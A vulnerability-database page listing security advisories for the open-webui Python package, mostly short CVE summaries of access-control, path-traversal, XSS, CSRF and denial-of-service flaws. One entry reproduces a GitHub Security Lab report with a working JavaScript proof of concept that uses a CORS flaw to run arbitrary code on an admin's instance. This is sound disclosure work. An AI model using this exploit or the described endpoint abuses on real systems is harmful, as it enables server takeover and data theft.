Search for packages
| purl | pkg:pypi/open-webui@0.2.3 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-14xt-qwyg-w3cj
Aliases: CVE-2026-44552 GHSA-3x8w-4f7p-xxc2 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the tool_servers and terminal_servers keys in utils/tools.py do use a prefix. When two or more Open WebUI instances share a Redis database (a supported and documented deployment pattern, e.g., for multi-region deployments, blue-green setups, or cluster topologies), the unprefixed keys collide. An admin on Instance A writing to tool_servers overwrites the value read by Instance B — causing Instance B's users to receive Instance A's tool server configuration. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-1cbp-qhss-83d7
Aliases: CVE-2024-7045 GHSA-c7fq-p62p-wvpc |
In version v0.3.8 of open-webui/open-webui, improper access control vulnerabilities allow an attacker to view any prompts. The application does not verify whether the attacker is an administrator, allowing the attacker to directly call the /api/v1/prompts/ interface to retrieve all prompt information created by the admin, which includes the ID values. Subsequently, the attacker can exploit the /api/v1/prompts/command/{command_id} interface to obtain arbitrary prompt information. |
Affected by 37 other vulnerabilities. |
|
VCID-1d16-1nak-pybs
Aliases: CVE-2024-7039 GHSA-pqwr-phvv-v49f |
In open-webui/open-webui version v0.3.8, there is an improper privilege management vulnerability. The application allows an attacker, acting as an admin, to delete other administrators via the API endpoint `http://0.0.0.0:8080/api/v1/users/{uuid_administrator}`. This action is restricted by the user interface but can be performed through direct API calls. |
Affected by 37 other vulnerabilities. |
|
VCID-22d8-rsah-vbg2
Aliases: CVE-2024-8053 GHSA-9vf8-xgwm-97r8 |
In version v0.3.10 of open-webui/open-webui, the `api/v1/utils/pdf` endpoint lacks authentication mechanisms, allowing unauthenticated attackers to access the PDF generation service. This vulnerability can be exploited by sending a POST request with an excessively large payload, potentially leading to server resource exhaustion and denial of service (DoS). Additionally, unauthorized users can misuse the endpoint to generate PDFs without verification, resulting in service misuse and potential operational and financial impacts. |
Affected by 36 other vulnerabilities. |
|
VCID-2xdz-v8cw-fygv
Aliases: CVE-2026-44556 GHSA-hp5m-24vp-vq2q |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /responses endpoint in the OpenAI router accepts any authenticated user and forwards requests directly to upstream LLM providers without enforcing per-model access control. While the primary chat completion endpoint (generate_chat_completion) checks model ownership, group membership, and AccessGrants before allowing a request, the /responses proxy only validates that the user has a valid session via get_verified_user. This allows any authenticated user to interact with any model configured on the instance by sending a POST request to /api/openai/responses with an arbitrary model ID. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-32yb-vsfs-43a8
Aliases: CVE-2026-44561 GHSA-hmgr-67hw-j2cq |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the is_user_channel_member function checks whether a ChannelMember row exists but does not check the is_active field. When a user is deactivated from a group or DM channel (removed by the channel owner, or leaves voluntarily), their membership row persists with is_active=False and status='left'. Because the authorization check ignores this field, the deactivated user retains full read and write access to the channel via direct API calls. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-3hv8-ys1d-63a6
Aliases: CVE-2024-12534 GHSA-g3mx-83mp-3rwc |
In version v0.3.32 of open-webui/open-webui, the application allows users to submit large payloads in the email and password fields during the sign-in process due to the lack of character length validation on these inputs. This vulnerability can lead to a Denial of Service (DoS) condition when a user submits excessively large strings, exhausting server resources such as CPU, memory, and disk space, and rendering the service unavailable for legitimate users. This makes the server susceptible to resource exhaustion attacks without requiring authentication. |
Affected by 34 other vulnerabilities. |
|
VCID-4a8y-jptx-xqgs
Aliases: CVE-2024-7041 GHSA-xcvc-5hgv-phqg |
An Insecure Direct Object Reference (IDOR) vulnerability exists in open-webui/open-webui version v0.3.8. The vulnerability occurs in the API endpoint `http://0.0.0.0:3000/api/v1/memories/{id}/update`, where the decentralization design is flawed, allowing attackers to edit other users' memories without proper authorization. |
Affected by 37 other vulnerabilities. |
|
VCID-4rz6-hw32-jueb
Aliases: CVE-2026-29070 GHSA-26gm-93rw-cchf |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue. |
Affected by 18 other vulnerabilities. |
|
VCID-4sn4-mrbm-dfgh
Aliases: CVE-2024-8060 GHSA-ff5c-56m7-vc75 |
OpenWebUI version 0.3.0 contains a vulnerability in the audio API endpoint `/audio/api/v1/transcriptions` that allows for arbitrary file upload. The application performs insufficient validation on the `file.content_type` and allows user-controlled filenames, leading to a path traversal vulnerability. This can be exploited by an authenticated user to overwrite critical files within the Docker container, potentially leading to remote code execution as the root user. |
Affected by 31 other vulnerabilities. |
|
VCID-4w4r-cf7s-e3ed
Aliases: CVE-2024-7034 GHSA-crh6-pj8c-xrhc |
In open-webui version 0.3.8, the endpoint `/models/upload` is vulnerable to arbitrary file write due to improper handling of user-supplied filenames. The vulnerability arises from the usage of `file_path = f"{UPLOAD_DIR}/{file.filename}"` without proper input validation or sanitization. An attacker can exploit this by manipulating the `file.filename` parameter to include directory traversal sequences, causing the resulting `file_path` to escape the intended `UPLOAD_DIR` and potentially overwrite arbitrary files on the system. This can lead to unauthorized modifications of system binaries, configuration files, or sensitive data, potentially enabling remote command execution. |
Affected by 37 other vulnerabilities. |
|
VCID-5319-t7jm-y3bx
Aliases: CVE-2026-44550 GHSA-hr43-rjmr-7wmm |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, FolderForm uses model_config = ConfigDict(extra='allow'), which permits arbitrary fields to pass through Pydantic validation and be included in model_dump(exclude_unset=True). In insert_new_folder, the server-assigned user_id is placed at the start of the dict and then overwritten by the spread of form data. Because FolderModel declares user_id: str as a real field (not just a form extra), any attacker-supplied user_id in the POST body is accepted by the model and persisted on the Folder row. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-5wzn-mfwg-ybc3
Aliases: CVE-2026-44558 GHSA-7rjh-px4v-5w55 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the channel router does not call filter_allowed_access_grants on either create or update paths. A non-admin user who can create group channels (or who owns a channel) can submit arbitrary access grants — including public wildcard grants — and those grants are stored verbatim, bypassing the admin's permission framework. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-68jf-2utx-x7br
Aliases: GHSA-6xcp-7mpr-m7wm |
Open WebUI has a CORS misconfiguration and session validation issue # GitHub Security Lab (GHSL) Vulnerability Report, open-webui: `GHSL-2024-174`, `GHSL-2024-175` The [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [open-webui](https://github.com/open-webui/open-webui). We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team. If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2024-174` or `GHSL-2024-175` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure. If you are _NOT_ the correct point of contact for this report, please let us know! ## Summary Due to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container's default setup, which allows for complete compromise of the container. ## Project open-webui ## Tested Version [v0.3.10](https://github.com/open-webui/open-webui/releases/tag/v0.3.10) ## Details ### Issue 1: CORS misconfiguration on multiple routers (`GHSL-2024-174`) CORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the `/api/v1/functions` endpoint (admins) can execute arbitrary code on the openwebui instance. The following pattern occurs at the following routers: 1. [backend/apps/webui/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/webui/main.py#L92) 2. [backend/apps/audio/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/audio/main.py#L58) 3. [backend/apps/images/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/images/main.py#L60) 4. [backend/apps/rag/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/rag/main.py#L246) 5. [backend/apps/openai/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/openai/main.py#L47) 6. [backend/apps/ollama/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/ollama/main.py#L62) 7. [backend/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/main.py#L881) ```python app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) ``` #### Impact This issue may lead to `Remote Code Execution`. #### Remediation The FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying `allow_origins=["*"]`. Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as `"*"` or `"*.com"` #### Proof of Concept Host the following code on your website, `attacker.com`. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command `whoami` placed into a newly created file `/tmp/whoami.txt`. Ensure you have logged into an admin open-webui account ```javascript <body> <p>Click here to login.</p> <div id="response"></div> <script> //Firefox cross site cookie request bypass const url = 'http://localhost:3000/static/favicon.png'; document.addEventListener("DOMContentLoaded", () => { document.onclick = () => { open(url); filter_id = "okok" //Create a function/filter to write code fetch('http://localhost:3000/api/v1/functions/create', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ "id": filter_id, "name": "test2", "meta": {"description": "test2"}, "content": "from pydantic import BaseModel, Field\nfrom typing import Optional\n\n\nclass Filter:\n class Valves(BaseModel):\n priority: int = Field(\n default=0, description=\"Priority level for the filter operations.\"\n )\n max_turns: int = Field(\n default=8, description=\"Maximum allowable conversation turns for a user.\"\n )\n pass\n\n class UserValves(BaseModel):\n max_turns: int = Field(\n default=4, description=\"Maximum allowable conversation turns for a user.\"\n )\n pass\n\n def __init__(self):\n # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\n # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\n # Alternatively, you can remove the files directly from the body in from the inlet hook\n # self.file_handler = True\n\n # Initialize 'valves' with specific configurations. Using 'Valves' instance helps encapsulate settings,\n # which ensures settings are managed cohesively and not confused with operational flags like 'file_handler'.\n self.valves = self.Valves()\n f = open(\"/tmp/whoami.txt\", \"w\")\n import subprocess\n\n output = subprocess.getoutput(\"whoami\")\n f.write(output)\n f.close()\n pass\n\n def inlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n return body\n\n def outlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n return body\n" }), credentials: 'include' // This will send cookies from the origin }) .then(response => response.json()) .then(data => console.log(data)) .catch((error) => console.error('Error:', error)); //Toggle the filter to execute code fetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, { method: 'POST', credentials: 'include' // This will send cookies from the origin }) .then(response => response.json()) .then(data => console.log(data)) .catch((error) => console.error('Error:', error)); } }); </script> </body> ``` ### Issue 2: Failure to Invalidate Session on Logout (`GHSL-2024-175`) Openwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser. This vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users. #### Impact This issue may increase the impact of primitives gained from other security issues. #### Remediation For every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser's storage. #### Resources [OWASP Recommendation On Sessions](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html) ## GitHub Security Advisories We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory). ## Credit These issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs). ## Contact You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2024-174` or `GHSL-2024-175` in any communication regarding these issues. ## Disclosure Policy This report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy). |
Affected by 32 other vulnerabilities. |
|
VCID-6ebf-sa2v-hfas
Aliases: CVE-2024-7043 GHSA-jrhc-9qg9-4qfq |
An improper access control vulnerability in open-webui/open-webui v0.3.8 allows attackers to view and delete any files. The application does not verify whether the attacker is an administrator, allowing the attacker to directly call the GET /api/v1/files/ interface to retrieve information on all files uploaded by users, which includes the ID values. The attacker can then use the GET /api/v1/files/{file_id} interface to obtain information on any file and the DELETE /api/v1/files/{file_id} interface to delete any file. |
Affected by 37 other vulnerabilities. |
|
VCID-7j5a-pu4k-kucf
Aliases: CVE-2025-63681 GHSA-frv8-gffc-37px |
open-webui v0.6.33 is vulnerable to Incorrect Access Control. The API /api/tasks/stop/ directly accesses and cancels tasks without verifying user ownership, enabling attackers (a normal user) to stop arbitrary LLM response tasks. |
Affected by 27 other vulnerabilities. |
|
VCID-7nbc-ng1s-suck
Aliases: CVE-2026-29071 GHSA-w9f8-gxf9-rhvw |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue. |
Affected by 18 other vulnerabilities. |
|
VCID-8n6u-wgz9-1bgj
Aliases: CVE-2026-28786 GHSA-vvxm-vxmr-624h |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an unsanitized filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments. Version 0.8.6 patches the issue. |
Affected by 18 other vulnerabilities. |
|
VCID-8qvj-xndv-v3ay
Aliases: CVE-2024-7806 GHSA-85jc-8h5p-8vw8 |
A vulnerability in open-webui/open-webui versions <= 0.3.8 allows remote code execution by non-admin users via Cross-Site Request Forgery (CSRF). The application uses cookies with the SameSite attribute set to lax for authentication and lacks CSRF tokens. This allows an attacker to craft a malicious HTML that, when accessed by a victim, can modify the Python code of an existing pipeline and execute arbitrary code with the victim's privileges. |
Affected by 32 other vulnerabilities. |
|
VCID-94nj-qkdf-xfhn
Aliases: CVE-2025-65958 GHSA-c6xv-rcvw-v685 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37. |
Affected by 24 other vulnerabilities. |
|
VCID-9jud-sr2a-8yc3
Aliases: CVE-2026-44549 GHSA-jwf8-pv5p-vhmc |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0. |
Affected by 23 other vulnerabilities. |
|
VCID-cc6s-thu3-2fb6
Aliases: CVE-2024-7035 GHSA-p5vx-9hj8-cf4h |
In version v0.3.8 of open-webui/open-webui, sensitive actions such as deleting and resetting are performed using the GET method. This vulnerability allows an attacker to perform Cross-Site Request Forgery (CSRF) attacks, where an unaware user can unintentionally perform sensitive actions by simply visiting a malicious site or through top-level navigation. The affected endpoints include /rag/api/v1/reset, /rag/api/v1/reset/db, /api/v1/memories/reset, and /rag/api/v1/reset/uploads. This impacts both the availability and integrity of the application. |
Affected by 37 other vulnerabilities. |
|
VCID-chug-ma8r-cucc
Aliases: CVE-2026-44557 GHSA-6c2x-gcp3-gp73 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the _validate_collection_access function uses an incomplete allowlist that only enforces ownership checks for collections matching user-memory-* and file-* patterns. All other collection names pass through unchecked — including the system-level knowledge-bases meta-collection, which stores the IDs, names, and descriptions of every knowledge base on the instance. Any authenticated user can query this meta-collection directly via the retrieval query endpoints to obtain a global index of all knowledge bases across all users. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-ctaa-zwsz-nydt
Aliases: CVE-2024-7033 GHSA-3p9q-7w63-3f8q |
In version 0.3.8 of open-webui/open-webui, an arbitrary file write vulnerability exists in the download_model endpoint. When deployed on Windows, the application improperly handles file paths, allowing an attacker to manipulate the file path to write files to arbitrary locations on the server's filesystem. This can result in overwriting critical system or application files, causing denial of service, or potentially achieving remote code execution (RCE). RCE can allow an attacker to execute malicious code with the privileges of the user running the application, leading to a full system compromise. |
Affected by 37 other vulnerabilities. |
|
VCID-fdkn-w3qr-wyem
Aliases: CVE-2024-7046 GHSA-gv26-qw3h-8qvp |
An improper access control vulnerability in open-webui/open-webui v0.3.8 allows an attacker to view admin details. The application does not verify whether the attacker is an administrator, allowing the attacker to directly call the /api/v1/auths/admin/details interface to retrieve the first admin (owner) details. |
Affected by 37 other vulnerabilities. |
|
VCID-gw81-2jrg-4kb6
Aliases: CVE-2024-7038 GHSA-mq92-jr35-ffpc |
An information disclosure vulnerability exists in open-webui version 0.3.8. The vulnerability is related to the embedding model update feature under admin settings. When a user updates the model path, the system checks if the file exists and provides different error messages based on the existence and configuration of the file. This behavior allows an attacker to enumerate file names and traverse directories by observing the error messages, leading to potential exposure of sensitive information. |
Affected by 37 other vulnerabilities. |
|
VCID-jnsg-u9dy-r3d5
Aliases: CVE-2025-64495 GHSA-w7xj-8fx7-wfch |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. In versions 0.6.34 and below, the functionality that inserts custom prompts into the chat window is vulnerable to DOM XSS when 'Insert Prompt as Rich Text' is enabled, since the prompt body is assigned to the DOM sink .innerHtml without sanitisation. Any user with permissions to create prompts can abuse this to plant a payload that could be triggered by other users if they run the corresponding / command to insert the prompt. This issue is fixed in version 0.6.35. |
Affected by 25 other vulnerabilities. |
|
VCID-jxmd-vgnc-97gx
Aliases: CVE-2024-7036 GHSA-wcwp-9rcp-jvfg |
A vulnerability in open-webui/open-webui v0.3.8 allows an unauthenticated attacker to sign up with excessively large text in the 'name' field, causing the Admin panel to become unresponsive. This prevents administrators from performing essential user management actions such as deleting, editing, or adding users. The vulnerability can also be exploited by authenticated users with low privileges, leading to the same unresponsive state in the Admin panel. |
Affected by 37 other vulnerabilities. |
|
VCID-k17g-bd9g-67f7
Aliases: CVE-2026-44570 GHSA-hmjq-crxp-7rjw |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, authorization controls surrounding the memories API were inconsistent, resulting in the ability of a standard user to delete, restore, and view the contents of other users' memories. Using a newly created non-admin user with no existing memories, it is possible to view existing memories via POST /api/v1/memories/query. Similarly, even if a non-admin user cannot modify another user's memory data via POST /api/v1/memories/{memory_id}/update, the endpoint's response improperly leaks the content of that memory if a valid memory_id is known. The DELETE /api/v1/memories/{memory_id} can also be used by any user to delete an existing memory. Deleted memories can then be restored by calling the POST /api/v1/memories/{memory_id}/update endpoint again. This vulnerability is fixed in 0.6.19. |
Affected by 28 other vulnerabilities. |
|
VCID-k3rr-yusn-k3b3
Aliases: CVE-2024-7983 GHSA-5v9m-57mq-qc75 |
In version 0.3.8 of open-webui, an endpoint for converting markdown to HTML is exposed without authentication. A maliciously crafted markdown payload can cause the server to spend excessive time converting it, leading to a denial of service. The server becomes unresponsive to other requests until the conversion is complete. |
Affected by 37 other vulnerabilities. |
|
VCID-mn21-kwuu-w7by
Aliases: CVE-2026-44569 GHSA-jxwr-g6r6-j3fx |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, there's an IDOR in the channels message management system that allows authenticated users to modify or delete any message within channels they have read access to. The vulnerability exists in the message update and delete endpoints, which implement channel-level authorization but completely lack message ownership validation. While the frontend correctly implements ownership checks (showing edit/delete buttons only for message owners or admins), the backend APIs bypass these protections by only validating channel access permissions without verifying that the requesting user owns the target message. This creates a client-side security control bypass where attackers can directly call the APIs to modify other users' messages. This vulnerability is fixed in 0.6.19. |
Affected by 28 other vulnerabilities. |
|
VCID-n4ma-zcpv-5fbp
Aliases: CVE-2026-44562 GHSA-mqq6-cqcx-38vg |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/models/import endpoint allows users with the workspace.models_import permission to overwrite any existing model in the database, regardless of ownership. When an imported model's ID matches an existing model, the endpoint merges the attacker's payload over the existing model data and writes it to the database with no ownership or access grant validation. Additionally, filter_allowed_access_grants is never called, bypassing the access grant restrictions enforced on all other model mutation endpoints. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-nxvm-97r4-6ybz
Aliases: CVE-2026-44560 GHSA-h36f-rqpx-j5wx |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the type: "file" (non-full-context), type: "text" with collection_name, and bare collection_name/collection_names paths in the get_sources_from_items function perform vector store queries without any authorization check, allowing users to extract content from files and knowledge bases they do not have access to. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-pkds-1xgn-q3bv
Aliases: CVE-2026-44551 GHSA-2r4p-jpmg-48f4 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP authentication endpoint does not validate that the submitted password is non-empty before performing a Simple Bind against the LDAP server. The LdapForm Pydantic model accepts password: str with no minimum length constraint, so an empty string passes validation. The subsequent Connection.bind() call succeeds on vulnerable LDAP servers, and the application issues a full session token for the target user. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-pvep-chj7-ekeg
Aliases: CVE-2025-64496 GHSA-cm35-v4vp-5xvx |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35. |
Affected by 25 other vulnerabilities. |
|
VCID-qjt1-zxx8-r7ht
Aliases: CVE-2026-44554 GHSA-7r82-qhg4-6wvj |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-r7vt-4bqm-f7hb
Aliases: CVE-2026-44559 GHSA-c7wp-3qh5-55pv |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the GET /api/v1/channels/{id}/members endpoint only checks membership for group and dm channel types (lines 467-469). For standard channels — including private ones — there is no channel_has_access check before returning the member list. Any authenticated user who knows a private channel's UUID can enumerate all users with access to that channel. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-rdr7-m8hc-pkgy
Aliases: CVE-2024-7044 GHSA-j274-m559-cj4j |
A Stored Cross-Site Scripting (XSS) vulnerability exists in the chat file upload functionality of open-webui/open-webui version 0.3.8. An attacker can inject malicious content into a file, which, when accessed by a victim through a URL or shared chat, executes JavaScript in the victim's browser. This can lead to user data theft, session hijacking, malware distribution, and phishing attacks. |
Affected by 37 other vulnerabilities. |
|
VCID-s625-eg1w-gfd1
Aliases: CVE-2026-44563 GHSA-rcvp-6fgw-c7fh |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the /api/generate, /api/embed, /api/embeddings, and /api/show endpoints accept any model name from the user and forward the request to the Ollama backend without checking whether the user is authorized to access that model. These endpoints only require get_verified_user (any authenticated non-pending user) and validate that the model exists in the full unfiltered model list, but never check AccessGrants.has_access(). This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-tz2k-gazs-mqgd
Aliases: CVE-2026-44565 GHSA-j3fw-wc48-29g3 |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.10, when uploading an audio file, the name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This vulnerability is fixed in 0.6.10. |
Affected by 30 other vulnerabilities. |
|
VCID-u25g-p4nx-gqd1
Aliases: CVE-2026-28788 GHSA-jjp7-g2jw-wh3j |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can overwrite any file's content by ID through the `POST /api/v1/retrieval/process/files/batch` endpoint. The endpoint performs no ownership check, so a regular user with read access to a shared knowledge base can obtain file UUIDs via `GET /api/v1/knowledge/{id}/files` and then overwrite those files, escalating from read to write. The overwritten content is served to the LLM via RAG, meaning the attacker controls what the model tells other users. Version 0.8.6 patches the issue. |
Affected by 18 other vulnerabilities. |
|
VCID-u3aa-dqz4-x7f3
Aliases: CVE-2024-7990 GHSA-gj27-76gq-5v3p |
A stored cross-site scripting (XSS) vulnerability exists in open-webui/open-webui version 0.3.8. The vulnerability is present in the `/api/v1/models/add` endpoint, where the model description field is improperly sanitized before being rendered in chat. This allows an attacker to inject malicious scripts that can be executed by any user, including administrators, potentially leading to arbitrary code execution. |
Affected by 37 other vulnerabilities. |
|
VCID-u5wv-y37r-rufz
Aliases: CVE-2024-7037 GHSA-54f4-v6v9-9q82 |
In version v0.3.8 of open-webui/open-webui, the endpoint /api/pipelines/upload is vulnerable to arbitrary file write and delete due to unsanitized file.filename concatenation with CACHE_DIR. This vulnerability allows attackers to overwrite and delete system files, potentially leading to remote code execution. |
Affected by 37 other vulnerabilities. |
|
VCID-u89c-p28n-c3hv
Aliases: CVE-2024-7053 GHSA-43g4-487m-5q6m |
A vulnerability in open-webui/open-webui version 0.3.8 allows an attacker with a user-level account to perform a session fixation attack. The session cookie for all users is set with the default `SameSite=Lax` and does not have the `Secure` flag enabled, allowing the session cookie to be sent over HTTP to a cross-origin domain. An attacker can exploit this by embedding a malicious markdown image in a chat, which, when viewed by an administrator, sends the admin's session cookie to the attacker's server. This can lead to a stealthy administrator account takeover, potentially resulting in remote code execution (RCE) due to the elevated privileges of administrator accounts. |
Affected by 37 other vulnerabilities. |
|
VCID-ujye-g4rj-8be5
Aliases: CVE-2026-44571 GHSA-jgj3-r8hr-9pjw |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, in standard channels (i.e., channels whose channel.type is neither group nor dm), the endpoint POST /api/v1/channels/{channel_id}/messages/{message_id}/update can be accessed with read permission only. When access_control is set to None, the authorization check has_access(..., type="read") evaluates to True, allowing users who are not the message owner to update messages. As a result, unauthorized modification of other users’ messages is possible. This vulnerability is fixed in 0.8.6. |
Affected by 18 other vulnerabilities. |
|
VCID-um53-kf7u-kkg6
Aliases: CVE-2026-34222 GHSA-7429-hxcv-268m |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, there is a broken access control vulnerability in tool values. This issue has been patched in version 0.8.11. |
Affected by 17 other vulnerabilities. |
|
VCID-vghe-uuzj-m7cu
Aliases: CVE-2026-44568 GHSA-fq3v-xjjx-95rc |
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the AccountPending.svelte component renders the admin-configured "Pending User Overlay Content" using marked.parse() inside {@html} with an incorrect DOMPurify application order. An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This vulnerability is fixed in 0.9.0. |
Affected by 0 other vulnerabilities. |
|
VCID-vj38-mn12-v7br
Aliases: CVE-2024-12537 GHSA-chf7-q7m5-fq92 |
In version 0.3.32 of open-webui/open-webui, the absence of authentication mechanisms allows any unauthenticated attacker to access the `api/v1/utils/code/format` endpoint. If a malicious actor sends a POST request with an excessively high volume of content, the server could become completely unresponsive. This could lead to severe performance issues, causing the server to become unresponsive or experience significant degradation, ultimately resulting in service interruptions for legitimate users. |
Affected by 34 other vulnerabilities. |
|
VCID-vkx3-71kv-sugt
Aliases: CVE-2026-44555 GHSA-9vvh-qmjx-p4q8 |
